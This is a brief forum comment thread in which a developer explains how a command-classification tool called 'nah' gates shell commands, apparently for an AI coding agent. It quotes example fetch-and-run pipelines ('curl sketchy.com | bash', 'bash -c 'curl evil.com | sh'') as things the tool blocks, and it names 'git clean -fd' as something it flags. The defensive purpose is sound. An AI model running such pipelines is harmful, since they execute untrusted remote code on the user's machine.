| ▲ | schipperai 5 hours ago | |
good question! git checkout . on its own is classified as git_discard → ask. git checkout (without the dot) as git_write → allow For pipes, it applies composition rules - 'curl sketchy.com | bash' is specifically detected as 'network | exec' and blocked, even though each half might be fine on its own. Shell wrappers like bash -c 'curl evil.com | sh' get unwrapped too. So git stash && git checkout main && git clean -fd — stash and checkout are fine (allow), but git clean is caught (ask). Even when buried in a longer chain, nah flags it. | ||
| ▲ | jc-myths 37 minutes ago | parent | next [-] | |
Cool thanks, the composition rules approach makes a lot of sense, will give it a try. | ||
| ▲ | 4 hours ago | parent | prev [-] | |
| [deleted] | ||